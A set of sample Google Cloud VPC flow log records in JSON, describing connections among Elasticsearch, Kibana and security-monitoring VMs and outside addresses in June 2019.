-{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.101","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"203.0.113.134","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.0.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"203.0.113.134","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 